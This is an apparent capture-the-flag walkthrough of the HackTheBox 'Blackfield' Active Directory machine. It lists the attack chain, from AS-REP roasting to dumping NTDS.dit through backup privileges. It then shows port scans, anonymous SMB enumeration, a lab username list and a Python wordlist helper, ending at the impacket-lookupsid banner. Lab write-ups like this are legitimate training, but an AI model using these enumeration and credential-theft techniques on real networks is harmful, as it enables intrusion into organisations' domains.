HackTheBox-Blackfield

Look at the stars
Look how they shine for you
And everything you do
Yeah, they were all yellow


Target IP: 10.129.229.17

Difficulty: Hard

Topics covered:

Information gathering and enumeration:

  • Port scanning and service identification (RustScan / Nmap)
  • SMB null-session enumeration and share discovery
  • Anonymous RPC lookup of the domain SID and RID brute-forcing of accounts (impacket-lookupsid)
  • Kerberos username enumeration (kerbrute)

Initial credential access:

  • AS-REP Roasting: requesting AS-REPs for accounts that do not require Kerberos pre-authentication and cracking the encrypted part offline (impacket-GetNPUsers)
  • Offline hash cracking (john / wordlist attack)

Abusing domain privileges and lateral movement:

  • AD access control list (ACL) enumeration and graph analysis (RustHound / BloodHound)
  • Abusing the ForceChangePassword right to reset another user's password (rpcclient)

Sensitive data extraction:

  • Downloading forensic artefacts over SMB and parsing an LSASS memory dump (pypykatz)
  • Pass-the-Hash (PtH) to obtain a WinRM session

Domain controller privilege escalation (final stage):

  • Token privilege audit (SeBackupPrivilege / SeRestorePrivilege)
  • Using a VSS (Volume Shadow Copy Service) snapshot to get around the lock on the live NTDS.dit (scripting and exposing the shadow copy with DiskShadow)
  • Using the backup privilege to read the AD database regardless of file-system ACLs (robocopy /b to copy NTDS.dit and the SYSTEM registry hive)
  • Parsing NTDS.dit offline to extract every domain account's hash (impacket-secretsdump)

Port scan

The open ports (DNS, Kerberos, MSRPC, LDAP, SMB, RPC over HTTP, global catalog, WinRM) are the classic domain controller profile, so everything that follows is Active Directory enumeration.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 10.129.229.17

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.229.17:53
Open 10.129.229.17:88
Open 10.129.229.17:135
Open 10.129.229.17:389
Open 10.129.229.17:445
Open 10.129.229.17:593
Open 10.129.229.17:3268
Open 10.129.229.17:5985
[~] Starting Script(s)
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-22 01:33 +0000
Initiating Ping Scan at 01:33
Scanning 10.129.229.17 [4 ports]
Completed Ping Scan at 01:33, 0.19s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:33
Completed Parallel DNS resolution of 1 host. at 01:33, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:33
Scanning 10.129.229.17 [8 ports]
Discovered open port 53/tcp on 10.129.229.17
Discovered open port 445/tcp on 10.129.229.17
Discovered open port 135/tcp on 10.129.229.17
Discovered open port 593/tcp on 10.129.229.17
Discovered open port 3268/tcp on 10.129.229.17
Discovered open port 88/tcp on 10.129.229.17
Discovered open port 5985/tcp on 10.129.229.17
Discovered open port 389/tcp on 10.129.229.17
Completed SYN Stealth Scan at 01:33, 0.25s elapsed (8 total ports)
Nmap scan report for 10.129.229.17
Host is up, received echo-reply ttl 127 (0.21s latency).
Scanned at 2026-06-22 01:33:03 UTC for 1s

PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds
Raw packets sent: 12 (504B) | Rcvd: 9 (380B)


Enumerate SMB shares. Just press Enter at the password prompt: the listing comes back over a null session, and the `-N` (no password) connection to profiles$ further down confirms anonymous access to that share. Beyond the default administrative shares there are two non-standard ones worth a look, `forensic` and `profiles$`.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -L //10.129.229.17
Password for [WORKGROUP\root]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.229.17 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -N //10.129.229.17/profiles$
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jun 3 16:47:12 2020
.. D 0 Wed Jun 3 16:47:12 2020
AAlleni D 0 Wed Jun 3 16:47:11 2020
ABarteski D 0 Wed Jun 3 16:47:11 2020
ABekesz D 0 Wed Jun 3 16:47:11 2020
ABenzies D 0 Wed Jun 3 16:47:11 2020
ABiemiller D 0 Wed Jun 3 16:47:11 2020
AChampken D 0 Wed Jun 3 16:47:11 2020
ACheretei D 0 Wed Jun 3 16:47:11 2020
ACsonaki D 0 Wed Jun 3 16:47:11 2020
AHigchens D 0 Wed Jun 3 16:47:11 2020
AJaquemai D 0 Wed Jun 3 16:47:11 2020
AKlado D 0 Wed Jun 3 16:47:11 2020
AKoffenburger D 0 Wed Jun 3 16:47:11 2020
AKollolli D 0 Wed Jun 3 16:47:11 2020
AKruppe D 0 Wed Jun 3 16:47:11 2020
AKubale D 0 Wed Jun 3 16:47:11 2020
ALamerz D 0 Wed Jun 3 16:47:11 2020
AMaceldon D 0 Wed Jun 3 16:47:11 2020
AMasalunga D 0 Wed Jun 3 16:47:11 2020
ANavay D 0 Wed Jun 3 16:47:11 2020
ANesterova D 0 Wed Jun 3 16:47:11 2020
ANeusse D 0 Wed Jun 3 16:47:11 2020
AOkleshen D 0 Wed Jun 3 16:47:11 2020
APustulka D 0 Wed Jun 3 16:47:11 2020
ARotella D 0 Wed Jun 3 16:47:11 2020
ASanwardeker D 0 Wed Jun 3 16:47:11 2020
AShadaia D 0 Wed Jun 3 16:47:11 2020
ASischo D 0 Wed Jun 3 16:47:11 2020
ASpruce D 0 Wed Jun 3 16:47:11 2020
ATakach D 0 Wed Jun 3 16:47:11 2020
ATaueg D 0 Wed Jun 3 16:47:11 2020
ATwardowski D 0 Wed Jun 3 16:47:11 2020
audit2020 D 0 Wed Jun 3 16:47:11 2020
AWangenheim D 0 Wed Jun 3 16:47:11 2020
AWorsey D 0 Wed Jun 3 16:47:11 2020
AZigmunt D 0 Wed Jun 3 16:47:11 2020
BBakajza D 0 Wed Jun 3 16:47:11 2020
BBeloucif D 0 Wed Jun 3 16:47:11 2020
BCarmitcheal D 0 Wed Jun 3 16:47:11 2020
BConsultant D 0 Wed Jun 3 16:47:11 2020
BErdossy D 0 Wed Jun 3 16:47:11 2020
BGeminski D 0 Wed Jun 3 16:47:11 2020
BLostal D 0 Wed Jun 3 16:47:11 2020
BMannise D 0 Wed Jun 3 16:47:11 2020
BNovrotsky D 0 Wed Jun 3 16:47:11 2020
BRigiero D 0 Wed Jun 3 16:47:11 2020
BSamkoses D 0 Wed Jun 3 16:47:11 2020
BZandonella D 0 Wed Jun 3 16:47:11 2020
CAcherman D 0 Wed Jun 3 16:47:12 2020
CAkbari D 0 Wed Jun 3 16:47:12 2020
CAldhowaihi D 0 Wed Jun 3 16:47:12 2020
CArgyropolous D 0 Wed Jun 3 16:47:12 2020
CDufrasne D 0 Wed Jun 3 16:47:12 2020
CGronk D 0 Wed Jun 3 16:47:11 2020
Chiucarello D 0 Wed Jun 3 16:47:11 2020
Chiuccariello D 0 Wed Jun 3 16:47:12 2020
CHoytal D 0 Wed Jun 3 16:47:12 2020
CKijauskas D 0 Wed Jun 3 16:47:12 2020
CKolbo D 0 Wed Jun 3 16:47:12 2020
CMakutenas D 0 Wed Jun 3 16:47:12 2020
CMorcillo D 0 Wed Jun 3 16:47:11 2020
CSchandall D 0 Wed Jun 3 16:47:12 2020
CSelters D 0 Wed Jun 3 16:47:12 2020
CTolmie D 0 Wed Jun 3 16:47:12 2020
DCecere D 0 Wed Jun 3 16:47:12 2020
DChintalapalli D 0 Wed Jun 3 16:47:12 2020
DCwilich D 0 Wed Jun 3 16:47:12 2020
DGarbatiuc D 0 Wed Jun 3 16:47:12 2020
DKemesies D 0 Wed Jun 3 16:47:12 2020
DMatuka D 0 Wed Jun 3 16:47:12 2020
DMedeme D 0 Wed Jun 3 16:47:12 2020
DMeherek D 0 Wed Jun 3 16:47:12 2020
DMetych D 0 Wed Jun 3 16:47:12 2020
DPaskalev D 0 Wed Jun 3 16:47:12 2020
DPriporov D 0 Wed Jun 3 16:47:12 2020
DRusanovskaya D 0 Wed Jun 3 16:47:12 2020
DVellela D 0 Wed Jun 3 16:47:12 2020
DVogleson D 0 Wed Jun 3 16:47:12 2020
DZwinak D 0 Wed Jun 3 16:47:12 2020
EBoley D 0 Wed Jun 3 16:47:12 2020
EEulau D 0 Wed Jun 3 16:47:12 2020
EFeatherling D 0 Wed Jun 3 16:47:12 2020
EFrixione D 0 Wed Jun 3 16:47:12 2020
EJenorik D 0 Wed Jun 3 16:47:12 2020
EKmilanovic D 0 Wed Jun 3 16:47:12 2020
ElKatkowsky D 0 Wed Jun 3 16:47:12 2020
EmaCaratenuto D 0 Wed Jun 3 16:47:12 2020
EPalislamovic D 0 Wed Jun 3 16:47:12 2020
EPryar D 0 Wed Jun 3 16:47:12 2020
ESachhitello D 0 Wed Jun 3 16:47:12 2020
ESariotti D 0 Wed Jun 3 16:47:12 2020
ETurgano D 0 Wed Jun 3 16:47:12 2020
EWojtila D 0 Wed Jun 3 16:47:12 2020
FAlirezai D 0 Wed Jun 3 16:47:12 2020
FBaldwind D 0 Wed Jun 3 16:47:12 2020
FBroj D 0 Wed Jun 3 16:47:12 2020
FDeblaquire D 0 Wed Jun 3 16:47:12 2020
FDegeorgio D 0 Wed Jun 3 16:47:12 2020
FianLaginja D 0 Wed Jun 3 16:47:12 2020
FLasokowski D 0 Wed Jun 3 16:47:12 2020
FPflum D 0 Wed Jun 3 16:47:12 2020
FReffey D 0 Wed Jun 3 16:47:12 2020
GaBelithe D 0 Wed Jun 3 16:47:12 2020
Gareld D 0 Wed Jun 3 16:47:12 2020
GBatowski D 0 Wed Jun 3 16:47:12 2020
GForshalger D 0 Wed Jun 3 16:47:12 2020
GGomane D 0 Wed Jun 3 16:47:12 2020
GHisek D 0 Wed Jun 3 16:47:12 2020
GMaroufkhani D 0 Wed Jun 3 16:47:12 2020
GMerewether D 0 Wed Jun 3 16:47:12 2020
GQuinniey D 0 Wed Jun 3 16:47:12 2020
GRoswurm D 0 Wed Jun 3 16:47:12 2020
GWiegard D 0 Wed Jun 3 16:47:12 2020
HBlaziewske D 0 Wed Jun 3 16:47:12 2020
HColantino D 0 Wed Jun 3 16:47:12 2020
HConforto D 0 Wed Jun 3 16:47:12 2020
HCunnally D 0 Wed Jun 3 16:47:12 2020
HGougen D 0 Wed Jun 3 16:47:12 2020
HKostova D 0 Wed Jun 3 16:47:12 2020
IChristijr D 0 Wed Jun 3 16:47:12 2020
IKoledo D 0 Wed Jun 3 16:47:12 2020
IKotecky D 0 Wed Jun 3 16:47:12 2020
ISantosi D 0 Wed Jun 3 16:47:12 2020
JAngvall D 0 Wed Jun 3 16:47:12 2020
JBehmoiras D 0 Wed Jun 3 16:47:12 2020
JDanten D 0 Wed Jun 3 16:47:12 2020
JDjouka D 0 Wed Jun 3 16:47:12 2020
JKondziola D 0 Wed Jun 3 16:47:12 2020
JLeytushsenior D 0 Wed Jun 3 16:47:12 2020
JLuthner D 0 Wed Jun 3 16:47:12 2020
JMoorehendrickson D 0 Wed Jun 3 16:47:12 2020
JPistachio D 0 Wed Jun 3 16:47:12 2020
JScima D 0 Wed Jun 3 16:47:12 2020
JSebaali D 0 Wed Jun 3 16:47:12 2020
JShoenherr D 0 Wed Jun 3 16:47:12 2020
JShuselvt D 0 Wed Jun 3 16:47:12 2020
KAmavisca D 0 Wed Jun 3 16:47:12 2020
KAtolikian D 0 Wed Jun 3 16:47:12 2020
KBrokinn D 0 Wed Jun 3 16:47:12 2020
KCockeril D 0 Wed Jun 3 16:47:12 2020
KColtart D 0 Wed Jun 3 16:47:12 2020
KCyster D 0 Wed Jun 3 16:47:12 2020
KDorney D 0 Wed Jun 3 16:47:12 2020
KKoesno D 0 Wed Jun 3 16:47:12 2020
KLangfur D 0 Wed Jun 3 16:47:12 2020
KMahalik D 0 Wed Jun 3 16:47:12 2020
KMasloch D 0 Wed Jun 3 16:47:12 2020
KMibach D 0 Wed Jun 3 16:47:12 2020
KParvankova D 0 Wed Jun 3 16:47:12 2020
KPregnolato D 0 Wed Jun 3 16:47:12 2020
KRasmor D 0 Wed Jun 3 16:47:12 2020
KShievitz D 0 Wed Jun 3 16:47:12 2020
KSojdelius D 0 Wed Jun 3 16:47:12 2020
KTambourgi D 0 Wed Jun 3 16:47:12 2020
KVlahopoulos D 0 Wed Jun 3 16:47:12 2020
KZyballa D 0 Wed Jun 3 16:47:12 2020
LBajewsky D 0 Wed Jun 3 16:47:12 2020
LBaligand D 0 Wed Jun 3 16:47:12 2020
LBarhamand D 0 Wed Jun 3 16:47:12 2020
LBirer D 0 Wed Jun 3 16:47:12 2020
LBobelis D 0 Wed Jun 3 16:47:12 2020
LChippel D 0 Wed Jun 3 16:47:12 2020
LChoffin D 0 Wed Jun 3 16:47:12 2020
LCominelli D 0 Wed Jun 3 16:47:12 2020
LDruge D 0 Wed Jun 3 16:47:12 2020
LEzepek D 0 Wed Jun 3 16:47:12 2020
LHyungkim D 0 Wed Jun 3 16:47:12 2020
LKarabag D 0 Wed Jun 3 16:47:12 2020
LKirousis D 0 Wed Jun 3 16:47:12 2020
LKnade D 0 Wed Jun 3 16:47:12 2020
LKrioua D 0 Wed Jun 3 16:47:12 2020
LLefebvre D 0 Wed Jun 3 16:47:12 2020
LLoeradeavilez D 0 Wed Jun 3 16:47:12 2020
LMichoud D 0 Wed Jun 3 16:47:12 2020
LTindall D 0 Wed Jun 3 16:47:12 2020
LYturbe D 0 Wed Jun 3 16:47:12 2020
MArcynski D 0 Wed Jun 3 16:47:12 2020
MAthilakshmi D 0 Wed Jun 3 16:47:12 2020
MAttravanam D 0 Wed Jun 3 16:47:12 2020
MBrambini D 0 Wed Jun 3 16:47:12 2020
MHatziantoniou D 0 Wed Jun 3 16:47:12 2020
MHoerauf D 0 Wed Jun 3 16:47:12 2020
MKermarrec D 0 Wed Jun 3 16:47:12 2020
MKillberg D 0 Wed Jun 3 16:47:12 2020
MLapesh D 0 Wed Jun 3 16:47:12 2020
MMakhsous D 0 Wed Jun 3 16:47:12 2020
MMerezio D 0 Wed Jun 3 16:47:12 2020
MNaciri D 0 Wed Jun 3 16:47:12 2020
MShanmugarajah D 0 Wed Jun 3 16:47:12 2020
MSichkar D 0 Wed Jun 3 16:47:12 2020
MTemko D 0 Wed Jun 3 16:47:12 2020
MTipirneni D 0 Wed Jun 3 16:47:12 2020
MTonuri D 0 Wed Jun 3 16:47:12 2020
MVanarsdel D 0 Wed Jun 3 16:47:12 2020
NBellibas D 0 Wed Jun 3 16:47:12 2020
NDikoka D 0 Wed Jun 3 16:47:12 2020
NGenevro D 0 Wed Jun 3 16:47:12 2020
NGoddanti D 0 Wed Jun 3 16:47:12 2020
NMrdirk D 0 Wed Jun 3 16:47:12 2020
NPulido D 0 Wed Jun 3 16:47:12 2020
NRonges D 0 Wed Jun 3 16:47:12 2020
NSchepkie D 0 Wed Jun 3 16:47:12 2020
NVanpraet D 0 Wed Jun 3 16:47:12 2020
OBelghazi D 0 Wed Jun 3 16:47:12 2020
OBushey D 0 Wed Jun 3 16:47:12 2020
OHardybala D 0 Wed Jun 3 16:47:12 2020
OLunas D 0 Wed Jun 3 16:47:12 2020
ORbabka D 0 Wed Jun 3 16:47:12 2020
PBourrat D 0 Wed Jun 3 16:47:12 2020
PBozzelle D 0 Wed Jun 3 16:47:12 2020
PBranti D 0 Wed Jun 3 16:47:12 2020
PCapperella D 0 Wed Jun 3 16:47:12 2020
PCurtz D 0 Wed Jun 3 16:47:12 2020
PDoreste D 0 Wed Jun 3 16:47:12 2020
PGegnas D 0 Wed Jun 3 16:47:12 2020
PMasulla D 0 Wed Jun 3 16:47:12 2020
PMendlinger D 0 Wed Jun 3 16:47:12 2020
PParakat D 0 Wed Jun 3 16:47:12 2020
PProvencer D 0 Wed Jun 3 16:47:12 2020
PTesik D 0 Wed Jun 3 16:47:12 2020
PVinkovich D 0 Wed Jun 3 16:47:12 2020
PVirding D 0 Wed Jun 3 16:47:12 2020
PWeinkaus D 0 Wed Jun 3 16:47:12 2020
RBaliukonis D 0 Wed Jun 3 16:47:12 2020
RBochare D 0 Wed Jun 3 16:47:12 2020
RKrnjaic D 0 Wed Jun 3 16:47:12 2020
RNemnich D 0 Wed Jun 3 16:47:12 2020
RPoretsky D 0 Wed Jun 3 16:47:12 2020
RStuehringer D 0 Wed Jun 3 16:47:12 2020
RSzewczuga D 0 Wed Jun 3 16:47:12 2020
RVallandas D 0 Wed Jun 3 16:47:12 2020
RWeatherl D 0 Wed Jun 3 16:47:12 2020
RWissor D 0 Wed Jun 3 16:47:12 2020
SAbdulagatov D 0 Wed Jun 3 16:47:12 2020
SAjowi D 0 Wed Jun 3 16:47:12 2020
SAlguwaihes D 0 Wed Jun 3 16:47:12 2020
SBonaparte D 0 Wed Jun 3 16:47:12 2020
SBouzane D 0 Wed Jun 3 16:47:12 2020
SChatin D 0 Wed Jun 3 16:47:12 2020
SDellabitta D 0 Wed Jun 3 16:47:12 2020
SDhodapkar D 0 Wed Jun 3 16:47:12 2020
SEulert D 0 Wed Jun 3 16:47:12 2020
SFadrigalan D 0 Wed Jun 3 16:47:12 2020
SGolds D 0 Wed Jun 3 16:47:12 2020
SGrifasi D 0 Wed Jun 3 16:47:12 2020
SGtlinas D 0 Wed Jun 3 16:47:12 2020
SHauht D 0 Wed Jun 3 16:47:12 2020
SHederian D 0 Wed Jun 3 16:47:12 2020
SHelregel D 0 Wed Jun 3 16:47:12 2020
SKrulig D 0 Wed Jun 3 16:47:12 2020
SLewrie D 0 Wed Jun 3 16:47:12 2020
SMaskil D 0 Wed Jun 3 16:47:12 2020
Smocker D 0 Wed Jun 3 16:47:12 2020
SMoyta D 0 Wed Jun 3 16:47:12 2020
SRaustiala D 0 Wed Jun 3 16:47:12 2020
SReppond D 0 Wed Jun 3 16:47:12 2020
SSicliano D 0 Wed Jun 3 16:47:12 2020
SSilex D 0 Wed Jun 3 16:47:12 2020
SSolsbak D 0 Wed Jun 3 16:47:12 2020
STousignaut D 0 Wed Jun 3 16:47:12 2020
support D 0 Wed Jun 3 16:47:12 2020
svc_backup D 0 Wed Jun 3 16:47:12 2020
SWhyte D 0 Wed Jun 3 16:47:12 2020
SWynigear D 0 Wed Jun 3 16:47:12 2020
TAwaysheh D 0 Wed Jun 3 16:47:12 2020
TBadenbach D 0 Wed Jun 3 16:47:12 2020
TCaffo D 0 Wed Jun 3 16:47:12 2020
TCassalom D 0 Wed Jun 3 16:47:12 2020
TEiselt D 0 Wed Jun 3 16:47:12 2020
TFerencdo D 0 Wed Jun 3 16:47:12 2020
TGaleazza D 0 Wed Jun 3 16:47:12 2020
TKauten D 0 Wed Jun 3 16:47:12 2020
TKnupke D 0 Wed Jun 3 16:47:12 2020
TLintlop D 0 Wed Jun 3 16:47:12 2020
TMusselli D 0 Wed Jun 3 16:47:12 2020
TOust D 0 Wed Jun 3 16:47:12 2020
TSlupka D 0 Wed Jun 3 16:47:12 2020
TStausland D 0 Wed Jun 3 16:47:12 2020
TZumpella D 0 Wed Jun 3 16:47:12 2020
UCrofskey D 0 Wed Jun 3 16:47:12 2020
UMarylebone D 0 Wed Jun 3 16:47:12 2020
UPyrke D 0 Wed Jun 3 16:47:12 2020
VBublavy D 0 Wed Jun 3 16:47:12 2020
VButziger D 0 Wed Jun 3 16:47:12 2020
VFuscca D 0 Wed Jun 3 16:47:12 2020
VLitschauer D 0 Wed Jun 3 16:47:12 2020
VMamchuk D 0 Wed Jun 3 16:47:12 2020
VMarija D 0 Wed Jun 3 16:47:12 2020
VOlaosun D 0 Wed Jun 3 16:47:12 2020
VPapalouca D 0 Wed Jun 3 16:47:12 2020
WSaldat D 0 Wed Jun 3 16:47:12 2020
WVerzhbytska D 0 Wed Jun 3 16:47:12 2020
WZelazny D 0 Wed Jun 3 16:47:12 2020
XBemelen D 0 Wed Jun 3 16:47:12 2020
XDadant D 0 Wed Jun 3 16:47:12 2020
XDebes D 0 Wed Jun 3 16:47:12 2020
XKonegni D 0 Wed Jun 3 16:47:12 2020
XRykiel D 0 Wed Jun 3 16:47:12 2020
YBleasdale D 0 Wed Jun 3 16:47:12 2020
YHuftalin D 0 Wed Jun 3 16:47:12 2020
YKivlen D 0 Wed Jun 3 16:47:12 2020
YKozlicki D 0 Wed Jun 3 16:47:12 2020
YNyirenda D 0 Wed Jun 3 16:47:12 2020
YPredestin D 0 Wed Jun 3 16:47:12 2020
YSeturino D 0 Wed Jun 3 16:47:12 2020
YSkoropada D 0 Wed Jun 3 16:47:12 2020
YVonebers D 0 Wed Jun 3 16:47:12 2020
YZarpentine D 0 Wed Jun 3 16:47:12 2020
ZAlatti D 0 Wed Jun 3 16:47:12 2020
ZKrenselewski D 0 Wed Jun 3 16:47:12 2020
ZMalaab D 0 Wed Jun 3 16:47:12 2020
ZMiick D 0 Wed Jun 3 16:47:12 2020
ZScozzari D 0 Wed Jun 3 16:47:12 2020
ZTimofeeff D 0 Wed Jun 3 16:47:12 2020
ZWausik D 0 Wed Jun 3 16:47:12 2020

5102079 blocks of size 4096. 1691376 blocks available

A long list of empty directories whose names look like usernames: most follow a first-initial-plus-surname pattern, while `audit2020`, `support` and `svc_backup` stand out as service or role accounts.

Turn the listing into a wordlist by keeping only the first column (the directory name):

awk '{print $1}' users.txt > users1.txt
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat users.txt
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
ACsonaki
AHigchens
AJaquemai
AKlado
AKoffenburger
AKollolli
AKruppe
AKubale
ALamerz
AMaceldon
AMasalunga
ANavay
ANesterova
ANeusse
AOkleshen
APustulka
ARotella
ASanwardeker
AShadaia
ASischo
ASpruce
ATakach
ATaueg
ATwardowski
audit2020
AWangenheim
AWorsey
AZigmunt
BBakajza
BBeloucif
BCarmitcheal
BConsultant
BErdossy
BGeminski
BLostal
BMannise
BNovrotsky
BRigiero
BSamkoses
BZandonella
CAcherman
CAkbari
CAldhowaihi
CArgyropolous
CDufrasne
CGronk
Chiucarello
Chiuccariello
CHoytal
CKijauskas
CKolbo
CMakutenas
CMorcillo
CSchandall
CSelters
CTolmie
DCecere
DChintalapalli
DCwilich
DGarbatiuc
DKemesies
DMatuka
DMedeme
DMeherek
DMetych
DPaskalev
DPriporov
DRusanovskaya
DVellela
DVogleson
DZwinak
EBoley
EEulau
EFeatherling
EFrixione
EJenorik
EKmilanovic
ElKatkowsky
EmaCaratenuto
EPalislamovic
EPryar
ESachhitello
ESariotti
ETurgano
EWojtila
FAlirezai
FBaldwind
FBroj
FDeblaquire
FDegeorgio
FianLaginja
FLasokowski
FPflum
FReffey
GaBelithe
Gareld
GBatowski
GForshalger
GGomane
GHisek
GMaroufkhani
GMerewether
GQuinniey
GRoswurm
GWiegard
HBlaziewske
HColantino
HConforto
HCunnally
HGougen
HKostova
IChristijr
IKoledo
IKotecky
ISantosi
JAngvall
JBehmoiras
JDanten
JDjouka
JKondziola
JLeytushsenior
JLuthner
JMoorehendrickson
JPistachio
JScima
JSebaali
JShoenherr
JShuselvt
KAmavisca
KAtolikian
KBrokinn
KCockeril
KColtart
KCyster
KDorney
KKoesno
KLangfur
KMahalik
KMasloch
KMibach
KParvankova
KPregnolato
KRasmor
KShievitz
KSojdelius
KTambourgi
KVlahopoulos
KZyballa
LBajewsky
LBaligand
LBarhamand
LBirer
LBobelis
LChippel
LChoffin
LCominelli
LDruge
LEzepek
LHyungkim
LKarabag
LKirousis
LKnade
LKrioua
LLefebvre
LLoeradeavilez
LMichoud
LTindall
LYturbe
MArcynski
MAthilakshmi
MAttravanam
MBrambini
MHatziantoniou
MHoerauf
MKermarrec
MKillberg
MLapesh
MMakhsous
MMerezio
MNaciri
MShanmugarajah
MSichkar
MTemko
MTipirneni
MTonuri
MVanarsdel
NBellibas
NDikoka
NGenevro
NGoddanti
NMrdirk
NPulido
NRonges
NSchepkie
NVanpraet
OBelghazi
OBushey
OHardybala
OLunas
ORbabka
PBourrat
PBozzelle
PBranti
PCapperella
PCurtz
PDoreste
PGegnas
PMasulla
PMendlinger
PParakat
PProvencer
PTesik
PVinkovich
PVirding
PWeinkaus
RBaliukonis
RBochare
RKrnjaic
RNemnich
RPoretsky
RStuehringer
RSzewczuga
RVallandas
RWeatherl
RWissor
SAbdulagatov
SAjowi
SAlguwaihes
SBonaparte
SBouzane
SChatin
SDellabitta
SDhodapkar
SEulert
SFadrigalan
SGolds
SGrifasi
SGtlinas
SHauht
SHederian
SHelregel
SKrulig
SLewrie
SMaskil
Smocker
SMoyta
SRaustiala
SReppond
SSicliano
SSilex
SSolsbak
STousignaut
support
svc_backup
SWhyte
SWynigear
TAwaysheh
TBadenbach
TCaffo
TCassalom
TEiselt
TFerencdo
TGaleazza
TKauten
TKnupke
TLintlop
TMusselli
TOust
TSlupka
TStausland
TZumpella
UCrofskey
UMarylebone
UPyrke
VBublavy
VButziger
VFuscca
VLitschauer
VMamchuk
VMarija
VOlaosun
VPapalouca
WSaldat
WVerzhbytska
WZelazny
XBemelen
XDadant
XDebes
XKonegni
XRykiel
YBleasdale
YHuftalin
YKivlen
YKozlicki
YNyirenda
YPredestin
YSeturino
YSkoropada
YVonebers
YZarpentine
ZAlatti
ZKrenselewski
ZMalaab
ZMiick
ZScozzari
ZTimofeeff
ZWausik

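As an added example (not code from the original write-up), here is a small Python parser that does the same wordlist step more carefully than the one-line awk: it skips `.`/`..` and file entries, deduplicates case-insensitively (sAMAccountName is case-insensitive, so `Smocker` and `smocker` are one principal), and separates out names that do not fit the first-initial-plus-surname pattern so `audit2020`, `support` and `svc_backup` can be tried first with kerbrute / GetNPUsers. The pattern check is a heuristic assumed here, not something the write-up states, and the embedded listing is a constructed excerpt in smbclient's column layout.

```python
"""Build a username wordlist from an anonymous `smbclient ... dir` listing.

Added example, not code from the original write-up. The listing embedded
below is a constructed excerpt in smbclient's column layout (name, attribute
flags, size, mtime); in practice paste the full saved output of `dir`.
"""
import re
from typing import List, Tuple

# Constructed excerpt of the profiles$ listing (same layout smbclient prints).
SAMPLE_DIR_LISTING = """\
  .                                   D        0  Wed Jun  3 16:47:12 2020
  ..                                  D        0  Wed Jun  3 16:47:12 2020
  AAlleni                             D        0  Wed Jun  3 16:47:11 2020
  ABarteski                           D        0  Wed Jun  3 16:47:11 2020
  audit2020                           D        0  Wed Jun  3 16:47:11 2020
  Chiucarello                         D        0  Wed Jun  3 16:47:11 2020
  support                             D        0  Wed Jun  3 16:47:12 2020
  svc_backup                          D        0  Wed Jun  3 16:47:12 2020
  notes.txt                           A      512  Wed Jun  3 16:47:12 2020

                5102079 blocks of size 4096. 1691376 blocks available
"""

# One listing entry: name (may contain spaces), attribute letters
# (D=directory, A=archive, H=hidden, S=system, R=read-only), size, mtime.
# The free-space summary line has no timestamp, so it never matches.
ENTRY_RE = re.compile(
    r"^\s*(?P<name>.+?)\s+(?P<attrs>[A-Z]+)\s+(?P<size>\d+)\s+"
    r"(?P<mtime>\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4})\s*$"
)


def parse_profile_dirs(listing: str) -> List[str]:
    """Return directory names from a `dir` listing in the order printed,
    skipping `.`/`..`, plain files and non-entry lines."""
    names = []
    for line in listing.splitlines():
        m = ENTRY_RE.match(line)
        if not m or "D" not in m.group("attrs"):
            continue
        name = m.group("name")
        if name in (".", ".."):
            continue
        names.append(name)
    return names


def looks_like_role_account(name: str) -> bool:
    """Heuristic (this example's assumption, not a rule from the write-up):
    the bulk of the profile folders follow FirstInitial+Surname, so a name
    that is all lowercase or contains a digit/underscore stands out as a
    service or role account (audit2020, support, svc_backup)."""
    return name == name.lower() or any(c.isdigit() or c == "_" for c in name)


def build_wordlist(listing: str) -> Tuple[List[str], List[str]]:
    """Deduplicate case-insensitively (sAMAccountName is case-insensitive,
    so kerbrute would test the same principal twice otherwise) and split off
    the role-looking names so they can be tried first."""
    seen = set()
    users: List[str] = []
    flagged: List[str] = []
    for name in parse_profile_dirs(listing):
        if name.lower() in seen:
            continue
        seen.add(name.lower())
        users.append(name)
        if looks_like_role_account(name):
            flagged.append(name)
    return users, flagged


def write_wordlist(names: List[str], path: str) -> int:
    """Write one name per line (kerbrute / GetNPUsers input); return count."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    users, flagged = build_wordlist(SAMPLE_DIR_LISTING)
    write_wordlist(users, "users.txt")
    write_wordlist(flagged, "users_priority.txt")
    print(f"{len(users)} candidates; try these first: {', '.join(flagged)}")
```

The regex anchors on the trailing timestamp rather than splitting on whitespace, so it also copes with share names containing spaces and ignores the free-space summary line that smbclient appends.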
Enumerate domain users with impacket-lookupsid. It also works anonymously (empty password at the prompt): it binds to the LSARPC named pipe, retrieves the domain SID and then brute-forces RIDs, resolving each one to a name and type. This gives a second, authoritative view of which accounts actually exist, independent of the profile folder names.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-lookupsid anonymous@10.129.229.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

